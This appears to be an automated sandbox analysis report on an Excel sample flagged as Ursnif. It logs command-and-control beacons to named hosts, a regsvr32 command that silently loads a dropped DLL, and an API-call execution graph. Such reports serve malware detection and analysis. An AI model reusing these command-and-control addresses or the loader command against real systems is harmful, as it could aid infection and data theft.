                                                                                                                                                                Jun 11, 2021 05:09:05.453524113 CEST8.8.8.8192.168.2.30xdfd3No error (0)authd.feronok.com185.233.80.31A (IP address)IN (0x0001)
                                                                                                                                                                Jun 11, 2021 05:09:27.540366888 CEST8.8.8.8192.168.2.30xe8d0No error (0)app.bighomegl.at185.233.80.31A (IP address)IN (0x0001)
                                                                                                                                                                Jun 11, 2021 05:09:48.331005096 CEST8.8.8.8192.168.2.30xb1cdNo error (0)authd.feronok.com185.233.80.31A (IP address)IN (0x0001)

                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                • authd.feronok.com
                                                                                                                                                                • app.bighomegl.at

                                                                                                                                                                HTTP Packets

                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                0192.168.2.349732185.233.80.3180C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Jun 11, 2021 05:07:35.230685949 CEST2298OUTGET /j0D4WkqJA4qbSI2s/tbqllkJ5QjS02c9/Y4oADFKhbig2E3MZ8L/S5BHZDPll/SOOSmvbSSzszfQOGO_2F/ebssg7ZOH9iTiK1egYa/TYvtl48FqSo7aXNnyk8zDn/0M4_2F1RU9EXO/TpeNu_2B/RPWPT_2BSfoiOaYRvUkNxcz/WR4a1P2fCQ/k1EnQMOdYbM0XsiH2/reukwmEF53hW/xa5HBUgFOAx/sGDiJ22uuBIopz/tZj9wmd1r7z3ANuAYbfIk/bhnJIJVnJvAXbS6_/2Fsif8yHgRIg6fa/a0BPP1Z_2FHpWsn1gk/fe5cFcowW/IKK9U HTTP/1.1
                                                                                                                                                                Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                Accept-Language: en-US
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                Host: authd.feronok.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Jun 11, 2021 05:07:35.765377045 CEST2298INHTTP/1.1 404 Not Found
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Fri, 11 Jun 2021 03:07:35 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                1192.168.2.349742185.233.80.3180C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Jun 11, 2021 05:08:18.773828030 CEST5430OUTGET /c0Zjvpk_/2BhHkEQKFoUb3aKx_2FuhQ9/zz1UpsMDGJ/MqFrowSgYmc2fzVA2/yf5xhKlVBQKb/rwrgpqZOvNV/mxBLQ1oxc7jv8k/5tQFefyNUnYTHJj33dQKu/YqZyqYfZuaOHFPro/3D3_2B6kK9arKKX/Wf1dZBj8QqS_2BWWVF/B7Ahpx3M5/Q3B93_2FcSTrCmxypMPT/8JVp8AUZzhfuucVY_2B/wCiIRjjYq_2FqoNLK9B6bf/0aSehXg9FwafT/cgt8pMOQ/HbDCojQOV1FVprYRnxx13U1/UwN8_2B_2F/vzILJE71SBej4gvGi/FIWIlMn9n/L3 HTTP/1.1
                                                                                                                                                                Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                Accept-Language: en-US
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                Host: authd.feronok.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Jun 11, 2021 05:08:19.317267895 CEST5430INHTTP/1.1 404 Not Found
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Fri, 11 Jun 2021 03:08:19 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                2192.168.2.349746185.233.80.3180C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Jun 11, 2021 05:08:42.281996965 CEST5468OUTGET /8N_2FW41xDzjkhrWQ/7Li83vNh8E0s/iNweknKPsr4/wqFKfz34i2ath6/I0bXROB0tUnNMBxp8qE25/AmJwK10jn6MVat3G/t7FuQx2zVw1ffa5/c7cpkHpQnz9kmDbUqx/Otf3v0Da9/dQZioOeK9Dz9hNXsqwu1/tlEzuHEM4S9kJrg9zGq/RjBYXn9MjpOQGxui0wmfPX/po6OMlacqL3xm/d_2FBFj8/AujuAR6DuH05PJMkT_2BTvZ/D_2BlXEdZ3/ZBW_2FuilrCeiWMje/rHsDq9syNU01/kSBqmc5Fyr_/2B3baeMNkKHxqo/p7TsHB_2FsB3Yjr2vV_2F/OiBfbqWQAEP/P_2F HTTP/1.1
                                                                                                                                                                Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                Accept-Language: en-US
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                Host: app.bighomegl.at
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Jun 11, 2021 05:08:42.816906929 CEST5468INHTTP/1.1 404 Not Found
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Fri, 11 Jun 2021 03:08:42 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                3192.168.2.349749185.233.80.3180C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Jun 11, 2021 05:09:05.515579939 CEST5470OUTGET /Nqnk1j8Pq1gJEs1x5F/Dd1hhfQAv/jtmHiVvgoBkcYEwLzLyA/C5p24Ce9YgRZRzxsjjD/nxl_2BdpzYbVr0QWXmBP9v/GO1k2SCoSQjXR/yxhwTnmC/pDIJ9c_2Bm_2FrJ_2B9wee3/JVSl6ysora/rGjwo8YPYfbP9mT94/HzBvhbCiqM7B/Bi1eHCPiGVL/46J0oLxANcfziq/thqSh_2Bozif3G_2Fo_2F/k6b3HZTG7RK0p_2F/ovJUD_2BB3IEisf/V1SwB6D9ZycfRmjdXo/1wtqe3ptL/omd3M4svRRs8_2F1Zp8h/fMxrdwrQxKRQQ81i3US/ttoCJ HTTP/1.1
                                                                                                                                                                Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                Accept-Language: en-US
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                Host: authd.feronok.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Jun 11, 2021 05:09:06.066171885 CEST5471INHTTP/1.1 404 Not Found
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Fri, 11 Jun 2021 03:09:06 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                4192.168.2.349757185.233.80.3180C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Jun 11, 2021 05:09:27.597299099 CEST5843OUTGET /1KWgQnO99/jRkbuys9zmBRLf_2Bfsk/j4hnRgNwvnusz6igqqU/69TUSClHMklgWWKD_2F1Zz/rzeT_2BYOFVhf/cyHjXUJp/RmO3IoI8my48PUoCkU_2Bq5/Szeo_2BZSo/JGYOsrFv3PDanQVBJ/aQVxlvGnm7ma/EvG_2Fcbphd/B7D_2FsJViKTei/G4P6ADPlZ3kryG2o13jPZ/lht8TN_2BF0SOOm1/wlXy9yuuvEg2t5t/0qJz6tISKUfXu3ooK_/2B_2FN_2B/Y8QRyMSJiCCXzc8ct_2F/cWxPiUkWHFklqYWaKgD/HT4v_2FZjRB5pDpaTPvsKl/vHhtteYEDrQEo/F_2BGZVP/fKC323Rf/6 HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                                                Host: app.bighomegl.at
                                                                                                                                                                Jun 11, 2021 05:09:28.119246960 CEST6020INHTTP/1.1 404 Not Found
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Fri, 11 Jun 2021 03:09:28 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Content-Length: 548
                                                                                                                                                                Connection: close
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                HTTPS Packets

                                                                                                                                                                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                Jun 11, 2021 05:06:40.844886065 CEST50.87.220.158443192.168.2.349714CN=www.quickbooks.aeymotors.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Wed Apr 14 11:12:56 CEST 2021 Wed Oct 07 21:21:40 CEST 2020Tue Jul 13 11:12:56 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                                                                Code Manipulations

                                                                                                                                                                Statistics

                                                                                                                                                                CPU Usage

                                                                                                                                                                Click to jump to process

                                                                                                                                                                Memory Usage

                                                                                                                                                                Click to jump to process

                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                Behavior

                                                                                                                                                                Click to jump to process

                                                                                                                                                                System Behavior

                                                                                                                                                                Analysis Process: EXCEL.EXE PID: 5988 Parent PID: 792

                                                                                                                                                                General

                                                                                                                                                                Start time:05:06:36
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                Imagebase:0x310000
                                                                                                                                                                File size:27110184 bytes
                                                                                                                                                                MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: regsvr32.exe PID: 6180 Parent PID: 5988

                                                                                                                                                                General

                                                                                                                                                                Start time:05:06:42
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:regsvr32 -s C:/Users/Public/SettingSyncY.dll
                                                                                                                                                                Imagebase:0xa40000
                                                                                                                                                                File size:20992 bytes
                                                                                                                                                                MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326306030.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326271156.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326446921.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326414458.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326370042.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.586749442.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326338980.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326396498.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.326427141.0000000005958000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: iexplore.exe PID: 6412 Parent PID: 792

                                                                                                                                                                General

                                                                                                                                                                Start time:05:07:32
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                                Imagebase:0x7ff693900000
                                                                                                                                                                File size:823560 bytes
                                                                                                                                                                MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: iexplore.exe PID: 6436 Parent PID: 6412

                                                                                                                                                                General

                                                                                                                                                                Start time:05:07:33
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6412 CREDAT:17410 /prefetch:2
                                                                                                                                                                Imagebase:0x170000
                                                                                                                                                                File size:822536 bytes
                                                                                                                                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: iexplore.exe PID: 5448 Parent PID: 792

                                                                                                                                                                General

                                                                                                                                                                Start time:05:08:17
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                                Imagebase:0x7ff693900000
                                                                                                                                                                File size:823560 bytes
                                                                                                                                                                MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: iexplore.exe PID: 5724 Parent PID: 5448

                                                                                                                                                                General

                                                                                                                                                                Start time:05:08:17
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5448 CREDAT:17410 /prefetch:2
                                                                                                                                                                Imagebase:0x170000
                                                                                                                                                                File size:822536 bytes
                                                                                                                                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: iexplore.exe PID: 5308 Parent PID: 792

                                                                                                                                                                General

                                                                                                                                                                Start time:05:08:40
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                                Imagebase:0x7ff693900000
                                                                                                                                                                File size:823560 bytes
                                                                                                                                                                MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: iexplore.exe PID: 5516 Parent PID: 5308

                                                                                                                                                                General

                                                                                                                                                                Start time:05:08:41
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5308 CREDAT:17410 /prefetch:2
                                                                                                                                                                Imagebase:0x170000
                                                                                                                                                                File size:822536 bytes
                                                                                                                                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: iexplore.exe PID: 6200 Parent PID: 792

                                                                                                                                                                General

                                                                                                                                                                Start time:05:09:03
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                                                                                                                                                Imagebase:0x7ff693900000
                                                                                                                                                                File size:823560 bytes
                                                                                                                                                                MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Analysis Process: iexplore.exe PID: 6012 Parent PID: 6200

                                                                                                                                                                General

                                                                                                                                                                Start time:05:09:04
                                                                                                                                                                Start date:11/06/2021
                                                                                                                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6200 CREDAT:17410 /prefetch:2
                                                                                                                                                                Imagebase:0x170000
                                                                                                                                                                File size:822536 bytes
                                                                                                                                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Chronological Activities

                                                                                                                                                                Disassembly

                                                                                                                                                                Code Analysis

                                                                                                                                                                Reset < >

                                                                                                                                                                  Analysis Process: regsvr32.exe PID: 6180 Parent PID: 5988 regsvr32.exeCOMMON

                                                                                                                                                                  Execution Graph

                                                                                                                                                                  Execution Coverage:5.2%
                                                                                                                                                                  Dynamic/Decrypted Code Coverage:18.7%
                                                                                                                                                                  Signature Coverage:9.7%
                                                                                                                                                                  Total number of Nodes:843
                                                                                                                                                                  Total number of Limit Nodes:28

                                                                                                                                                                  Graph

                                                                                                                                                                  execution_graph 14998 67da6beb 14999 67da6c0d 14998->14999 15001 67da7188 14999->15001 15002 67da71cd 15001->15002 15003 67da7269 VirtualAlloc 15002->15003 15005 67da722b VirtualAlloc 15002->15005 15004 67da72af 15003->15004 15006 67da72c8 VirtualAlloc 15004->15006 15005->15003 15021 67da6e3e 15006->15021 15009 67da7402 VirtualProtect 15011 67da7421 15009->15011 15013 67da7454 15009->15013 15010 67da7331 15010->15009 15012 67da742f VirtualProtect 15011->15012 15011->15013 15012->15011 15014 67da74d6 VirtualProtect 15013->15014 15015 67da7511 VirtualProtect 15014->15015 15017 67da756e VirtualFree GetPEB 15015->15017 15018 67da759a 15017->15018 15023 67da70be GetPEB 15018->15023 15020 67da75de 15022 67da6e4d VirtualFree 15021->15022 15022->15010 15024 67da70ee 15023->15024 15024->15020 15025 67cd20ce GetCurrentThread SetThreadAffinityMask 15026 67cd20ec SetThreadPriority 15025->15026 15027 67cd20f1 15025->15027 15026->15027 15032 67cd1c7d 15027->15032 15030 67cd2104 15031 67cd2100 SetThreadPriority 15031->15030 15059 67cd1f10 CreateEventA 15032->15059 15034 67cd1c8e 15035 67cd1c9c GetSystemTime SwitchToThread 15034->15035 15036 67cd1d9e 15034->15036 15065 67cd18ad 15035->15065 15036->15030 15036->15031 15039 67cd1cd9 15039->15036 15073 67cd1adb 15039->15073 15042 67cd1d8f 15042->15036 15043 67cd1d98 GetLastError 15042->15043 15043->15036 15048 67cd1d5f WaitForSingleObject 15051 67cd1d7c CloseHandle 15048->15051 15052 67cd1d70 GetExitCodeThread 15048->15052 15049 67cd1d85 GetLastError 15049->15042 15050 67cd1d05 GetLongPathNameW 15053 67cd1d1a 15050->15053 15058 67cd1d38 15050->15058 15051->15042 15052->15051 15093 67cd1b58 HeapAlloc 15053->15093 15055 67cd1d24 15056 67cd1d2d GetLongPathNameW 15055->15056 15055->15058 15094 67cd142f HeapFree 15056->15094 15095 67cd13d1 CreateThread 15058->15095 15060 67cd1f2e GetVersion 15059->15060 15061 67cd1f75 GetLastError 15059->15061 15062 67cd1f38 GetCurrentProcessId OpenProcess 15060->15062 15063 67cd1f70 15060->15063 15064 67cd1f65 15062->15064 15063->15034 15064->15034 15066 67cd18c9 15065->15066 15067 67cd19ec Sleep 15066->15067 15068 67cd18d4 VirtualAlloc 15066->15068 15067->15035 15067->15039 15068->15067 15072 67cd1916 15068->15072 15069 67cd19c0 memcpy 15071 67cd19da VirtualFree 15069->15071 15070 67cd19d3 15070->15071 15071->15067 15072->15069 15072->15070 15099 67cd1697 15073->15099 15075 67cd1b52 15075->15042 15075->15058 15081 67cd134f 15075->15081 15076 67cd1b41 HeapFree 15076->15075 15077 67cd1afc 15077->15075 15077->15076 15106 67cd1e8a GetLocaleInfoA 